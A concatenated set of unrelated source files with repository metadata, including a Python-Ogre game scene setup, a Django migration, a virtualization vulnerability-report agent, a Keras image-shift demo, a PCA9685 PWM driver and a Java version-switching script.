#self.uinode.yaw(ogre.Degree(-90))
# The Root constructor for the ogre
def createRoot(self):
self.root = ogre.Root()
# Here the resources are read from the resources.cfg
def defineResources(self):
cf = ogre.ConfigFile()
cf.load("resources.cfg")
seci = cf.getSectionIterator()
while seci.hasMoreElements():
secName = seci.peekNextKey()
settings = seci.getNext()
for item in settings:
typeName = item.key
archName = item.value
ogre.ResourceGroupManager.getSingleton().addResourceLocation(archName, typeName, secName)
# Create and configure the rendering system (either DirectX or OpenGL) here
def setupRenderSystem(self):
if not self.root.restoreConfig() and not self.root.showConfigDialog():
raise Exception("User canceled the config dialog -> Application.setupRenderSystem()")
# Create the render window
def createRenderWindow(self):
self.root.initialise(True, "CS 381 Spring 2012 Engine Version 1.0")
# Initialize the resources here (which were read from resources.cfg in defineResources()
def initializeResourceGroups(self):
ogre.TextureManager.getSingleton().setDefaultNumMipmaps(5)
ogre.ResourceGroupManager.getSingleton().initialiseAllResourceGroups()
# Now, create a scene here. Three things that MUST BE done are sceneManager, camera and
# viewport initializations
def setupScene(self):
self.sceneManager = self.root.createSceneManager(ogre.ST_GENERIC, "Default SceneManager")
self.camera = self.sceneManager.createCamera("Camera")
self.camera.nearClipDistance = 5
self.viewPort = self.root.getAutoCreatedWindow().addViewport(self.camera)
self.sceneManager.ambientLight = 1, 1, 1
#Setup a title plane
self.titlePlane = ogre.Plane((1, 0, 1), 2)
meshManager = ogre.MeshManager.getSingleton()
meshManager.createPlane('Title', 'General', self.titlePlane,
750, 800, 20, 20, True, 1, 1, 1, (1, 0, 0))
self.tent = self.sceneManager.createEntity('TitleEntity', 'Title')
self.titlenode = self.sceneManager.getRootSceneNode().createChildSceneNode()
self.titlenode.attachObject(self.tent)
self.tent.setMaterialName('Examples/TitleScreen')
self.titlenode.setPosition(0,250,0)
#Setup an story plane
self.sPlane = ogre.Plane((1, 0, 1), 1)
meshManager = ogre.MeshManager.getSingleton()
meshManager.createPlane('Story', 'General', self.sPlane,
750, 800, 20, 20, True, 1, 1, 1, (1, 0, 0))
self.stent = self.sceneManager.createEntity('StoryEntity', 'Story')
self.stnode = self.sceneManager.getRootSceneNode().createChildSceneNode("stnode", (0,200,-10))
self.stnode.attachObject(self.stent)
self.stent.setMaterialName('Examples/StoryScreen')
self.stnode.setPosition(0,250,0)
#Setup an instruction plane
self.inPlane = ogre.Plane((1, 0, 1), 0)
meshManager = ogre.MeshManager.getSingleton()
meshManager.createPlane('Instructions', 'General', self.inPlane,
750, 800, 20, 20, True, 1, 1, 1, (1, 0, 0))
self.ient = self.sceneManager.createEntity('InstructionEntity', 'Instructions')
self.ientnode = self.sceneManager.getRootSceneNode().createChildSceneNode("ientnode", (0,200,-10))
self.ientnode.attachObject(self.ient)
self.ient.setMaterialName('Examples/InstructionsScreen')
self.ientnode.setPosition(0,250,0)
# Setup a ground plane.
#plane = ogre.Plane ((0, 1, 0), -100)
self.groundPlane = ogre.Plane ((0, 1, 0), 0)
meshManager = ogre.MeshManager.getSingleton ()
meshManager.createPlane ('Ground', 'General', self.groundPlane,
12000, 12000, 20, 20, True, 1, 1, 1, (0, 0, 1))
ent = self.sceneManager.createEntity('GroundEntity', 'Ground')
self.sceneManager.getRootSceneNode().createChildSceneNode ().attachObject (ent)
ent.setMaterialName ('Examples/GrassPatern')
#setup tree plane shows up
self.treePlane = ogre.Plane((0, 0, -1), -6000)
meshManager = ogre.MeshManager.getSingleton ()
meshManager.createPlane ('Trees', 'General', self.treePlane,
1500, 12000, 20, 20, True, 1, 1, 1, (1, 0, 0))
trent = self.sceneManager.createEntity('treesEntity', 'Trees')
self.boundnode = self.sceneManager.getRootSceneNode().createChildSceneNode()
self.boundnode.attachObject(trent)
trent.setMaterialName ('Examples/treebox2')
self.boundnode.setPosition(0,700,0)
self.tree1Plane = ogre.Plane((0, 0, 1), -6000)
meshManager = ogre.MeshManager.getSingleton ()
meshManager.createPlane ('Trees1', 'General', self.tree1Plane,
1500, 12000, 20, 20, True, 1, 1, 1, (1, 0, 0))
trent1 = self.sceneManager.createEntity('trees1Entity', 'Trees1')
self.bound1node = self.sceneManager.getRootSceneNode().createChildSceneNode()
self.bound1node.attachObject(trent1)
trent1.setMaterialName ('Examples/treebox')
self.bound1node.setPosition(0,700,0)
self.tree2Plane = ogre.Plane((1, 0, 0), -6000)
meshManager = ogre.MeshManager.getSingleton ()
meshManager.createPlane ('Trees2', 'General', self.tree2Plane,
1500, 12000, 20, 20, True, 1, 1, 1, (0, 0, 1))
trent2 = self.sceneManager.createEntity('trees2Entity', 'Trees2')
self.boundnode2 = self.sceneManager.getRootSceneNode().createChildSceneNode()
self.boundnode2.attachObject(trent2)
trent2.setMaterialName ('Examples/treebox2')
self.boundnode2.setPosition(0,700,0)
self.tree3Plane = ogre.Plane((-1, 0, 0), -6000)
meshManager = ogre.MeshManager.getSingleton ()
meshManager.createPlane ('Trees3', 'General', self.tree3Plane,
1500, 12000, 20, 20, True, 1, 1, 1, (0, 0, 1))
trent3 = self.sceneManager.createEntity('trees3Entity', 'Trees3')
self.boundnode3 = self.sceneManager.getRootSceneNode().createChildSceneNode()
self.boundnode3.attachObject(trent3)
trent3.setMaterialName ('Examples/treebox')
self.boundnode3.setPosition(0,700,0)
# Setup a UI plane.
self.uiPlane = ogre.Plane ((0, 0, 1), 0)
meshManager = ogre.MeshManager.getSingleton ()
meshManager.createPlane ('Interface', 'General', self.uiPlane,
750, 800, 20, 20, True, 1, 1, 1, (1, 0, 0))
uent = self.sceneManager.createEntity('UIEntity', 'Interface')
self.uinode = self.sceneManager.getRootSceneNode().createChildSceneNode()
self.uinode.attachObject(uent)
uent.setMaterialName ('Examples/InstructionsScreen')
self.uinode.setPosition(0,2000,100)
self.uinode.yaw(ogre.Degree(40))
# environmental stuff
ent.castShadows = False
self.sceneManager.setSkyBox (True, "Examples/CloudyNoonSkyBox", 5000, False)
self.camYawNode = self.sceneManager.getRootSceneNode().createChildSceneNode('CamNode1',
(0, 200, 500))
#node.yaw(ogre.Degree(-45))
self.camYawNode.yaw(ogre.Degree(0))
self.camera.lookAt((0,0,0))
self.camPitchNode = self.camYawNode.createChildSceneNode('PitchNode1')
self.camPitchNode.attachObject(self.camera)
# In the end, clean everything up (= delete)
#def cleanUp(self):
def stop(self):
del self.root
| [
"jesus.florespadilla@yahoo.com"
] | jesus.florespadilla@yahoo.com |
6aa5681f125b8a73167c2dfdba8b7fdb9c678e06 | 2901489f227a97e25c0c65240628af40bc1c167d | /django_razorpay/src/migrations/0004_auto_20210803_0954.py | c11b15126b7c7287e82765af0b514b37634dbfcf | [] | no_license | P-1702/Payment-Gateway | 5452c0ea4acd8fd4a0fcdf5a0ce557ca06eaa099 | f9c1fa326a7851d231cdf8de3b73357abfd20b8e | refs/heads/master | 2023-07-01T19:08:47.048874 | 2021-08-04T12:38:57 | 2021-08-04T12:38:57 | 392,681,334 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 329 | py | # Generated by Django 3.1.7 on 2021-08-03 04:24
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('src', '0003_auto_20210803_0949'),
]
operations = [
migrations.RenameModel(
old_name='Payments',
new_name='Payment',
),
]
| [
"muprat172@gmail.com"
] | muprat172@gmail.com |
c93b3085e92eda3e230de1b7f13d0c1ee4cdba54 | e187a8b23f47d7124b53682452658d9bfc2066d0 | /CloudTest/CloudTest/node_ta/agent_quick_flaw_scan.py | b5b17408fff8833bfb8bd104320d745d1319442a | [] | no_license | PhelanWang/CloudProject | 6f4f1e16f6f6c71b8071f8361ae2ecf5bdf82c2d | d103dbe2e0a81c6f957331f51a1c13b133aae94f | refs/heads/master | 2022-07-06T21:22:35.299093 | 2019-04-18T13:25:59 | 2019-04-18T13:25:59 | 166,331,942 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,677 | py | # -*- coding: utf-8 -*-
__author__ = 'root'
def is_load_external():
return globals().has_key('AGENT_LOADER')
# Execute this while run this agent file directly
if not is_load_external():
# Import ctest package
from lib.agent.ctest import SwitchAgent
# Create SwitchAgent instance
agent = SwitchAgent(__name__)
# Register function "my_openvas" on service "openvas"
# OK
# http://192.168.1.117:9000/switch/agent/quick_kvmflaw_scan
# args = '' or None
# version = '1.0.2'
@agent.entry("quick_kvmflaw_scan", version="1.0.1")
def my_quick_kvmflaw_scan(subtask_id,args):
from quick_flaw_scan.ShowInfoOfScankvm_flaw import getFlawInfoBySql
virus_table = "select * from kvm_flaw_scan"
# 此处的report返回一个包含所有kvm漏洞信息的列表
report = []
report = getFlawInfoBySql(virus_table)
if report == []:
detail = '测试功能获取系统信息,然后扫描vce,oval漏洞信息库,列出漏洞名称和漏洞信息。\n' \
'本次扫描在此系统中没有发现QEMU-KVM漏洞。\n'
report = [{'bugName': '无', 'bugInfo': '无'}]
else:
detail = '测试功能获取系统信息,然后扫描vce,oval漏洞信息库,列出漏洞名称和漏洞信息。\n' \
'QEMU-KVM漏洞:根据系统环境,扫描系统列出系统中可能存在的QEMU-KVM漏洞。\n'
agent.post_report(subtask_id,
severity=1,
result=0,
brief='result of quick_kvmflaw_scan',
detail=detail.replace('\n', '</br>'),
json_data=report)
# OK
# http://192.168.1.117:9000/switch/agent/quick_ovirtflaw_scan
# args = '' or None
# version = '1.0.2'
@agent.entry("quick_ovirtflaw_scan", version="1.0.1")
def my_quick_ovirtflaw_scan(subtask_id,args):
from quick_flaw_scan.ShowInfoOfScanOvirt_flaw import getFlawInfoBySql
print 'startup quick_ovirtflaw_scan'
# 此处的report返回一个包含所有Ovirt漏洞信息的列表
report = getFlawInfoBySql("select * from Ovirt_flaw_scan")
if report == []:
detail = '测试功能获取系统信息,然后扫描vce,oval漏洞信息库,列出漏洞名称和漏洞信息。\n' \
'在此系统中没有发现oVirt漏洞。\n'
report = [{'bugName': '无', 'bugInfo': '无'}]
else:
detail = '测试功能获取系统信息,然后扫描vce,oval漏洞信息库,列出漏洞名称和漏洞信息。\n' \
'oVirt漏洞:根据系统环境,扫描系统列出系统中可能存在的oVirt漏洞。\n'
agent.post_report(subtask_id,
severity=1,
result=0,
brief='result of quick_kvmflaw_scan',
detail=detail.replace('\n', '</br>'),
json_data=report)
# http://192.168.1.117:9000/switch/agent/quick_libvirtflaw_scan
# args = '' or None
# version = '1.0.2'
@agent.entry("quick_libvirtflaw_scan", version="1.0.1")
def my_quick_libvirtflaw_scan(subtask_id, args):
from quick_flaw_scan.ShowInfoOfScanlibvirt_flaw import getFlawInfoBySql
# 此处的report返回一个包含所有libvirt漏洞信息的列表
report = getFlawInfoBySql("select * from libvirt_flaw_scan")
if report == []:
detail = '测试功能获取系统信息,然后扫描vce,oval漏洞信息库,列出漏洞名称和漏洞信息。\n' \
'在此系统中没有发现libvirt漏洞。\n'
report = [{'bugName': '无', 'bugInfo': '无'}]
else:
detail = '测试功能获取系统信息,然后扫描vce,oval漏洞信息库,列出漏洞名称和漏洞信息。\n' \
'libvirt漏洞:根据系统环境,扫描系统列出系统中可能存在的libvirt漏洞。\n'
agent.post_report(subtask_id,
severity=1,
result=0,
brief='result of quick_kvmflaw_scan',
detail=detail.replace('\n', '</br>'),
json_data=report)
# OK
# http://192.168.1.117:9000/switch/agent/quick_VDSMflaw_scan
# args = '' or None
# version = '1.0.2'
@agent.entry("quick_VDSMflaw_scan", version="1.0.1")
def my_quick_VDSMflaw_scan(subtask_id,args):
from quick_flaw_scan.ShowInfoOfScanVDSM_flaw import getFlawInfoBySql
print("Start scan. . .\n")
report = getFlawInfoBySql("select * from VDSM_flaw_scan")#此处的report返回一个包含所有VDSM漏洞信息的列表
if report == []:
detail = '测试功能获取系统信息,然后扫描vce,oval漏洞信息库,列出漏洞名称和漏洞信息。\n' \
'在此系统中没有发现VDSM漏洞。\n'
report = [{'bugName': '无', 'bugInfo': '无'}]
else:
detail = '测试功能获取系统信息,然后扫描vce,oval漏洞信息库,列出漏洞名称和漏洞信息。\n' \
'VDSM漏洞:根据系统环境,扫描系统列出系统中可能存在的VDSM漏洞。\n'
print detail, report
agent.post_report(subtask_id,
severity=1,
result=0,
brief='result of quick_kvmflaw_scan',
detail=detail.replace('\n', '</br>'),
json_data=report)
# Execute this while run this agent file directly
if not is_load_external():
# my_quick_VDSMflaw_scan(0, 0)
# my_quick_libvirtflaw_scan(0, 0)
# my_quick_ovirtflaw_scan(0, 0)
# my_quick_kvmflaw_scan(0, 0)
# Run agent
agent.run()
# 格式修改全部完成 | [
"1825633959@qq.com"
] | 1825633959@qq.com |
4db7df871d0e756cc3c77119d78e5b1511d56535 | bea2621cfdd7e7bb9390339bb87e5692806a645f | /verticalShift.py | 7ae1dd1b30c68ede9ee320b49068a5eefdfca7f5 | [] | no_license | Artmann/data_augmentation | 1afd0b2a93a268770ef31de3b98efff7d7bf5a65 | f4c908613a2988f04ef1a45a7d21baa6e47305b7 | refs/heads/main | 2023-02-22T23:37:37.709027 | 2021-01-24T07:50:39 | 2021-01-24T07:50:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,366 | py | # python program to demonstrate the vertical shift of the image with the height_shift_range argument
# we import all our required libraries
from numpy import expand_dims
from keras.preprocessing.image import load_img
from keras.preprocessing.image import img_to_array
from keras.preprocessing.image import ImageDataGenerator
from matplotlib import pyplot
# we first load the image
image = load_img('parrot.jpg')
# we converting the image which is in PIL format into the numpy array, so that we can apply deep learning methods
dataImage = img_to_array(image)
# print(dataImage)
# expanding dimension of the load image
imageNew = expand_dims(dataImage, 0)
# now here below we creating the object of the data augmentation class
imageDataGen = ImageDataGenerator(height_shift_range=0.4)
# because as we alreay load image into the memory, so we are using flow() function, to apply transformation
iterator = imageDataGen.flow(imageNew, batch_size=1)
# below we generate augmented images and plotting for visualization
for i in range(9):
# we are below define the subplot
pyplot.subplot(330 + 1 + i)
# generating images of each batch
batch = iterator.next()
# again we convert back to the unsigned integers value of the image for viewing
image = batch[0].astype('uint8')
# we plot here raw pixel data
pyplot.imshow(image)
# visualize the the figure
pyplot.show()
| [
"noreply@github.com"
] | noreply@github.com |
c9ccb921814b23fe474ca6b3e2c1613e8783603f | c2d1b262e0ffc2f61cb3fb36b2d0ae63f5e6d151 | /src/hw/pwm/pwm_provider_pca9685.py | d91bf5a9176b983448f418528d29de0bccecf305 | [
"BSD-3-Clause"
] | permissive | geoff-coppertop/train-turnout-control-python | d78bdb3ef7fc4d903197959ff7b1d846ed5e8ef5 | dec330e0e9931ee43b59c97d300b82c37d35253b | refs/heads/master | 2022-07-30T12:19:59.351399 | 2018-03-27T02:18:46 | 2018-03-27T02:25:40 | 121,705,692 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,564 | py | #!/usr/bin/env python
# # -*- coding: utf-8 -*-
#-------------------------------------------------------------------------------
# pwm_provider_pca9685.py
#
# G. Thomas
# 2018
#-------------------------------------------------------------------------------
import logging
from src.hw.pwm.pwm_provider import PWMProvider
class PWMProviderPCA9685(PWMProvider):
"""Concrete definition of a PWM provider that use the PCA9685"""
MIN_FREQ = 24
MAX_FREQ = 1526
MIN_PIN = 0
MAX_PIN = 15
def __init__(self, device, pin):
"""Creates a PWM provider
Uses a PCA9685 device and the desired pin on that device
"""
self.__logger = logging.getLogger('hw.pwm.pwm-provider-pca9685')
self.__dev = device
self.__pin = pin
self.__logger.info('PCA9685 PWM provider created')
self.__logger.info('Pin: %d', pin)
assert(self.__pin >= self.MIN_PIN)
assert(self.__pin <= self.MAX_PIN)
super(PWMProviderPCA9685, self).__init__(self.MIN_FREQ, self.MAX_FREQ)
def set_duty(self, duty):
"""Sets the duty cycle of the pin specified by the PWM provider.
Duty cycle is expressed as a percentage.
"""
self.__logger.info('Requested duty: %d', duty)
# TODO: these checks should probably be moved to the base class
# Check that the duty cycle requested is valid
assert(duty >= self._min_duty)
assert(duty <= self._max_duty)
self.__logger.info('Limited duty: %d', duty)
# Scale duty to send it to the PCA9685
duty = int(duty * 0x0FFF / 100)
self.__logger.info('Scaled duty: %d', duty)
PWMProvider.set_duty(self, duty)
def set_freq(self, freq):
"""Set PWM frequency for the PWM provider.
For the PCA9685 this affects all pins simulatneously.
"""
self.__logger.info('Current freq: %d', self.__dev.get_pwm_frequency())
self.__logger.info('Requested freq: %d', freq)
# TODO: these checks should probably be moved to the base class
# Check that the freq requested is valid
assert(freq > self._min_freq)
assert(freq < self._max_duty)
if(freq == self.__dev.get_pwm_frequency()):
return
self.__dev.set_pwm_frequency(freq)
def turn_on(self):
"""Turn on the PWM provider at the set duty cycle"""
self.__dev.set_pwm(self.__pin, self._duty)
def turn_off(self):
"""Turn off the PWM provider"""
self.__dev.set_pwm(self.__pin, 0)
| [
"geoffrey.thomas@garmin.com"
] | geoffrey.thomas@garmin.com |
5a9dff2f0a91e131b60e46a368beace41b98b3dd | f0c9df58c012c7fcd64346cc5a3ac0275656156f | /BM3D_py/cpp2py_test/close_power_of_2_test.py | c16be25364ba84dcdf092a1eaef023b746667cfd | [
"MIT"
] | permissive | oleges1/denoising_project | 48c32e419bd9172354b6bf30eae7fe47db37817d | c2b5048db3dd2bf3261d0cd2e8fec0588d765387 | refs/heads/master | 2023-01-02T08:23:54.705304 | 2020-10-22T14:35:19 | 2020-10-22T14:35:19 | 306,343,881 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 508 | py | import numpy as np
def my_closest_power_of_2(M, max):
M = np.where(max < M, max, M)
while max > 1:
M = np.where((max // 2 < M) * (M < max), max // 2, M)
max //= 2
return M
def closest_power_of_2(n):
r = 1
while r * 2 <= n:
r *= 2
return r
if __name__ == '__main__':
for i in range(20):
print(i, closest_power_of_2(i))
n = np.arange(60)
res_n = my_closest_power_of_2(n, 16)
for i, v in enumerate(res_n):
print(i, '-->', v)
| [
"ya.hef@yandex.ru"
] | ya.hef@yandex.ru |
d017df644bde5225b2ea4930d586dc593bd9fa99 | d24f39c95eb2fc89851d90464eb0cdf3b2c6c60f | /Ondas Planas/movimento_sem_ateunacao.py | bccad25aaecfea2adbf04f2fe0a877cc2cb7416d | [] | no_license | marcos-moura97/eletromagnetism_python | d74c62a85df0e2b81e18555583ce4146fd106e0f | f44f7afc5fad8ffc58dd8be5ec7e074a37b69e41 | refs/heads/master | 2023-08-28T08:10:02.568516 | 2021-11-04T10:48:05 | 2021-11-04T10:48:05 | 299,422,313 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,681 | py | import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import math
pi = math.pi #Famoso pi
Emaxmais = 10 #Amplitude do campo incidente
FimaisGraus = 0 #Fase Finais (graus) da amplitude do campo incidente
Emaxmenos = 10 #Amplitude do campo refletido
FimenosGraus = 0 #Fase Fimenos (graus) da amplitude do campo refletido
nco = 2 #Numero de comprimentos de onda para o tracado do grafico.
# Chamei de ng o Numero de Graficos de ondas desejado. Comece com ng=1,
# depois faca ng = 2, 3, 4,...,18,...,36,... para voce ver a formacao da onda
ng=18 #Numero de graficos de ondas desejado.
# Chamei de step a defasagem em graus (wt) de um grafico para outro.
# Se o step for 5 graus, e.g., entao, para termos uma volta completa no circulo
# trigonometrico, teremos que fazer ng = 72, pois 72x5=360 graus, isto significa
# que a defasagem entre o primeiro e o ultimo grafico eh 360 graus. Um bom par
# eh ng=36 e step=10. (e.g.= exempli gratia (Latim) = por exemplo)
step = 20 #Defasagem em graus de um grafico para outro
####################### SOBRE O FILME ################
n = 2 #Numero de vezes de repeticao do filme
fps = 1 #Numero de quadros por segundo (frames por segundo) do filme
################### INICIO DOS CALCULOS ################
eps=2.2204e-16 #para evitar dividir por 0
SWR=(Emaxmais+Emaxmenos)/((Emaxmais-Emaxmenos)+eps)
modulo_Coeficiente_Reflexao = (SWR-1)/(SWR+1)
Perda_de_Retorno_dB= 20 * math.log10(modulo_Coeficiente_Reflexao)
Fimais = FimaisGraus*pi/180 #transforma graus para radianos
Fimenos = FimenosGraus*pi/180 #transforma graus para radianos
Bzmax = nco*2*pi #transforma graus para radianos
################## INICIO DAS MATRIZES ################
Bz = np.linspace(0, Bzmax,100) #faz Bz (Beta_z) variar linearmente espacado de 0 a Bzmax
OndaIncidente = np.zeros([ng,len(Bz)]) #inicia a matriz que guardará o valor da onda incidente de todos os ng gráficos
OndaRefletida = np.zeros([ng,len(Bz)]) #inicia a matriz que guardará o valor da onda refletida de todos os ng gráficos
OndaTotal = np.zeros([ng,len(Bz)]) #inicia a matriz que guardará o valor total da onda para todos os ng gráficos
ims=[]
fig = plt.figure()
for k in range(ng): # Equivale a variar o tempo. Cada valor de k equivale a um dado tempo (wt)
wtGraus = step*(k-1) # faz omega_t variar em graus, comecando em 0 graus
wt = wtGraus*pi/180 # transforma omega_t de graus para radianos
Envoltoria=np.sqrt(Emaxmais**2 + Emaxmenos**2 + 2*Emaxmais*Emaxmenos*np.cos(2*Bz+Fimenos-Fimais))
#Armazena nas matrizes os valores dos graficos incidente, refletido e total para cada tempo
OndaIncidente[k] = Emaxmais*np.cos(wt-Bz+Fimais)
OndaRefletida[k] = Emaxmenos*np.cos(wt+Bz+Fimenos)
OndaTotal[k]= OndaIncidente[k] + OndaRefletida[k] #Emaxmais*np.cos(wt-Bz+Fimais)+Emaxmenos*np.cos(wt+Bz+Fimenos)
#Plota o grafico da envoltoria e das tres ondas, incidente, refletida e total, simultaneamente.
# im = plt.imshow(OndaRefletida, animated=True)
# ims.append([im])
#ani = animation.ArtistAnimation(fig, ims, interval=50, blit=True,
# repeat_delay=1000)
plt.plot(Bz,Envoltoria,'g--', Bz,-Envoltoria,'g--', label="Envoltória")
plt.plot(Bz,OndaTotal[k],'b', label="Onda Total")
plt.plot(Bz,OndaIncidente[k],'r--', label="Onda Incidente")
plt.plot(Bz,OndaRefletida[k],'k--', label="Onda Refletida")
legend = plt.legend(loc='upper right', shadow=True, fontsize='small')
# Put a nicer background color on the legend.
legend.get_frame().set_facecolor('C0')
plt.show()
| [
"noreply@github.com"
] | noreply@github.com |
5415aabb59728ebc4a5c6162aa5db91bddd6490d | a9e3f3ad54ade49c19973707d2beb49f64490efd | /Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/cms/envs/devstack_docker.py | 2eece814deae2c31cf5456b34af9e0f386c38c4e | [
"AGPL-3.0-only",
"AGPL-3.0-or-later",
"MIT"
] | permissive | luque/better-ways-of-thinking-about-software | 8c3dda94e119f0f96edbfe5ba60ca6ec3f5f625d | 5809eaca7079a15ee56b0b7fcfea425337046c97 | refs/heads/master | 2021-11-24T15:10:09.785252 | 2021-11-22T12:14:34 | 2021-11-22T12:14:34 | 163,850,454 | 3 | 1 | MIT | 2021-11-22T12:12:31 | 2019-01-02T14:21:30 | JavaScript | UTF-8 | Python | false | false | 129 | py | """ Overrides for Docker-based devstack. """
from .devstack import * # pylint: disable=wildcard-import, unused-wildcard-import
| [
"rafael.luque@osoco.es"
] | rafael.luque@osoco.es |
a51b08bd33feac6916911115650f7cd6e8d8124f | 194d3a2a704497ab4462cf29528df030cc8ddc54 | /binarysearch.py | 04cbc935c02205db3c05a96f4aa1ca346e00c2d6 | [] | no_license | nitinps/PESU-IO-SUMMER | f3525d76f55cddb92111641fd1ca3dcad338fb1e | e197c6f95ebd3f3c68bde0715656c713903f7cdc | refs/heads/master | 2020-05-31T15:17:13.064978 | 2019-07-07T17:34:49 | 2019-07-07T17:34:49 | 190,353,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 473 | py | numbers=[]
pos=-1
found=0
low=0
high=int(input("Enter length of list: "))
print("Enter numbers: ")
for i in range(0,high):
k=int(input())
numbers.append(k)
x=int(input("Enter number you want to search: "))
while low<=high and found==0:
mid=int((low+high)/2)
if(numbers[mid]==x):
pos=mid
found=1
elif x<numbers[mid]:
high=mid-1
else:
low=mid+1
if pos==-1:
print('Not found')
else:
print('found at position: ',pos)
| [
"51399837+nitinps@users.noreply.github.com"
] | 51399837+nitinps@users.noreply.github.com |
1a8fdc4014ea36359c165795b904676bd01011cd | 2636b249a82b8bdeb02166aea94f3941dece962c | /manage.py | 768c4e6fb3926f7578c87b80e90dcac45f7d286b | [] | no_license | van0509/muxueonline | 87a2f542f5b9bf15d43cf49710bb92e9f0e65266 | 1dd02a0ecff114575b27463ad1aa5b555089430c | refs/heads/master | 2020-03-27T07:52:39.566043 | 2018-09-06T12:55:59 | 2018-09-06T12:56:00 | 146,198,946 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 543 | py | #!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'muxueonline.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| [
"free001@vip.qq.com"
] | free001@vip.qq.com |
10e8fdc24e2631260da50fd20f4deaaab12510ab | c1e0874f55d05ee990ed2d637c2910701b32d246 | /soft_uni_fundamentals/Data Types and Variables/exercises/03_elevator.py | 6b18bc3621dfad99d97435503cea446731f70608 | [] | no_license | borislavstoychev/Soft_Uni | 5d047bef402c50215e0abc825476326889ffd0be | ccc0b2fb18f8ad6809b475eb20e82a9e4eb4b0b0 | refs/heads/master | 2023-05-11T12:27:08.672058 | 2021-05-28T18:00:10 | 2021-05-28T18:00:10 | 277,556,731 | 3 | 2 | null | 2021-02-11T19:57:37 | 2020-07-06T13:58:23 | Python | UTF-8 | Python | false | false | 119 | py | n = int(input())
p = int(input())
if n % p == 0:
courses = n//p
else:
courses = n // p + 1
print(courses) | [
"noreply@github.com"
] | noreply@github.com |
7e8163e5286903c46159443b731345784fe85218 | de69dd4c86f7c7b0a5a1fa0c27fb45c8241b36ea | /reserveTime/asgi.py | ea213ba502d8da84f87ec7ab762a76eb8928f976 | [] | no_license | Sim30n/DIY-online-booking | bec065abc546b9915c3bbab9af3f7e6d7a797be9 | 68ab52506d0294260f7746762908265738854007 | refs/heads/main | 2023-03-10T03:05:59.492591 | 2021-02-21T14:35:57 | 2021-02-21T14:35:57 | 336,381,521 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 399 | py | """
ASGI config for reserveTime project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'reserveTime.settings')
application = get_asgi_application()
| [
"petteri.sarkka@fmail.com"
] | petteri.sarkka@fmail.com |
a6d0047071d0b232286f98b5287c49a605e6a21e | 320a98d428bf06eff6f3f209b1eadeb366a65482 | /common/version.py | c4dd9de7ffd4c1b577a51386ff7b1cc74c444cd3 | [] | no_license | Ryan--Yang/share | 6fe8b21918206fed903bd7a315216b47e58f697e | 4acc658f7c0a8f1b50f7b5c0b8884b96fe1e137d | refs/heads/master | 2020-12-31T02:42:22.125477 | 2013-12-04T07:27:53 | 2013-12-24T01:54:38 | 14,791,494 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 4,644 | py | from util import *
default_java_file = '/usr/lib/jvm/default-java'
gcc_file = '/usr/bin/gcc'
def handle_option():
global args
parser = argparse.ArgumentParser(description = 'Set up the version of Java',
formatter_class = argparse.RawTextHelpFormatter,
epilog = '''
examples:
python %(prog)s -v 1.5
python %(prog)s -v 1.7.0_45
''')
parser.add_argument('-s', '--set-version', dest='set_version', help='set version')
parser.add_argument('-g', '--get', dest='get_version', help='get version', action='store_true')
parser.add_argument('-t', '--target', dest='target', help='target to set version with', choices=['java', 'gcc'], default='gcc')
args = parser.parse_args()
if len(sys.argv) <= 1:
parser.print_help()
def setup():
pass
def get_version():
if not args.get_version:
return
if args.target == 'java':
get_version_java()
elif args.target == 'gcc':
get_version_gcc()
def set_version():
if not args.set_version:
return
if args.target == 'java':
set_version_java()
elif args.target == 'gcc':
set_version_gcc()
def get_version_java():
java_version_result = execute('java -version', silent=True, catch=True)
match = re.match('java version "(.*)"', java_version_result)
java_version = match.group(1)
java_home_result = os.getenv('JAVA_HOME')
if java_home_result:
match = re.match('jdk(.*)', java_home_result)
if match:
java_home = match.group(1)
else:
error('JAVA_HOME is not expected')
else:
java_home = 'NULL'
if os.path.exists(default_java_file):
default_java_result = execute('ls -l ' + default_java_file, silent=True, catch=True)
match = re.match('.*jdk(.*)', default_java_result)
if match:
default_java = match.group(1)
else:
error('default-java is not expected')
else:
default_java = 'NULL'
#info(java_version_result)
#if java_home_result:
# info(java_home_result)
#if default_java_result:
# info(default_java_result)
info('java -v: ' + java_version)
info('JAVA_HOME: ' + java_home)
info('default-java: ' + default_java)
def set_version_java():
if args.set_version == '1.5':
version = '1.5.0_22'
elif args.set_version == '1.6':
version = '1.6.0_45'
elif args.set_version == '1.7':
version = '1.7.0_45'
else:
version = args.set_version
execute('sudo update-alternatives --install /usr/bin/javac javac /usr/lib/jvm/jdk' + version + '/bin/javac 50000')
execute('sudo update-alternatives --install /usr/bin/java java /usr/lib/jvm/jdk' + version + '/bin/java 50000')
execute('sudo update-alternatives --install /usr/bin/javaws javaws /usr/lib/jvm/jdk' + version + '/bin/javaws 50000')
execute('sudo update-alternatives --install /usr/bin/javap javap /usr/lib/jvm/jdk' + version + '/bin/javap 50000')
execute('sudo update-alternatives --install /usr/bin/jar jar /usr/lib/jvm/jdk' + version + '/bin/jar 50000')
execute('sudo update-alternatives --install /usr/bin/jarsigner jarsigner /usr/lib/jvm/jdk' + version + '/bin/jarsigner 50000')
execute('sudo update-alternatives --config javac')
execute('sudo update-alternatives --config java')
execute('sudo update-alternatives --config javaws')
execute('sudo update-alternatives --config javap')
execute('sudo update-alternatives --config jar')
execute('sudo update-alternatives --config jarsigner')
